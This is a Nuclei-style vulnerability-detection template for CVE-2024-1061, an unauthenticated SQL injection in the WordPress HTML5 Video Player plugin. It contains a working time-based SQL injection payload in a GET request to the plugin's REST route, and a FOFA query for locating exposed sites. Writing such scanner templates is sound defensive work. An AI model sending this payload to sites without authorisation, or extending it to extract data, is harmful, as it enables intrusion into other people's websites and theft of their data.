id: CVE-2024-1061

info:
  name: WordPress HTML5 Video Player - SQL Injection
  author: xxcdd
  severity: high
  description: |
    WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
  reference:
    - https://www.tenable.com/security/research/tra-2024-02
    - https://wordpress.org/plugins/html5-video-player
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-1061
    cwe-id: CWE-89
  metadata:
    verified: true
    fofa-query: "\"wordpress\" && body=\"html5-video-player\""
    max-request: 1
  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player

http:
  - method: GET
    path:
      - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "created_at", "video_id")'
        condition: and
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950